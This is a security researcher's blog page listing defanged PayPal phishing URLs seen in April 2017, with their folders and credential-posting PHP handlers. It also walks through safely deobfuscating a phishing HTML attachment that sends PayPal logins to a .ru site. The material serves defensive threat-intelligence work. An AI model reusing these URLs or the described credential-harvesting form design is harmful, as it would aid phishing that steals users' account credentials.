Collection of Paypal Phishes seen by @neonprimetime

Below is a timelined Collection of Paypal Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://ga2017[.]com/misc/wp.php
Folder: misc
Page: wp.php
Source: @malware_traffic
Meta Page Title: Log in to your PɑyPɑl ɑccount
Meta Page Author: None
Post page(s): wp.php



Seen Live on: 4/9/2017
Url: hxxp://www.paypal[.]com[.]cgi-bin.w3bscrcmd222f91e14e61be374f236df6bd32e71434.456b6064cc4ba375cc0d415be95807ecdeed6789.2488b2cc5808b734242446e29e5e0ca8.5555b2aa5708b14344143e29e51011.gurame.com.sg/.string/w3b.login.cmd/
Folder: w3b.login.cmd
Page: Default
Source: PhishTank.com
Meta Page Title: Log in to your PayPal account
Meta Page Author: DecrypteD
Post page(s): inc/visit.php , inc/login.php



Seen Live on: 4/9/2017
Url: hxxp://opthimpro[.]ru/RU/support/9f22ee9c5bc81fc8c71373bc861d0bbeZDZmOTI1MDEzZWZmOWUxNjA0N2IwOTZjNjI1MzNhZWU=/myaccount/websc_verification/
Folder: websc_verification
Page: Default
Source: PhishTank.com
Meta Page Title: Empty
Meta Page Author: None
Post page(s): Templates/MO_VBV.php





More about neonprimetime

• neonprimetime pastebin
• neonprimetime virustotal
• @neonprimetime twitter
• neonprimetime reddit

Top Blogs of all-time

1. pagerank botnet sql injection walk-thru
2. DOM XSS 101 Walk-Through
3. An Invoice email and a Hot mess of Java

Top Github Contributions

1. Qualys Scantronitor 2.0

Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Walking Thru a Phishing Email Attachment

Here's a walk-thru of how I look at a Phishing Email Attachment.

There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This likely came from a user opening/clicking on an attachment in an email.

Since McAfee marked as Infected and deleted it, the file was no longer in the original folder that the alert had triggered. But it was in the McAfee Quarantine folder as a .bup so I was able to extract it like this.

The file that came back was this ugly javascript, obfuscated and hard to read. Just at a high level, if you look at this document it contains this massively long Base64 encoded variable which is then decoded and de-obfuscated by the ugly javascript into some working HTML code that the user's browser or email client would then display.

I know this because I see at the bottom the javascript command 'document.write' which is used to write raw HTML to a page. Now to be safe, I didn't want to run this javascript directly, so I re-saved this javascript and changed 'document.write' to 'console.log'. What this does is allow me to see the HTML without actually having the browser render it (much safer). Then I hit F12 to see my firefox developer tools, re-load the javascript, and see in the console tab that the HTML is now outputted for me.

After the javascript runs, the HTML displayed is this. It's an HTML form styled nicely to phish Paypal credentials and send them to an .ru (russian) website.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.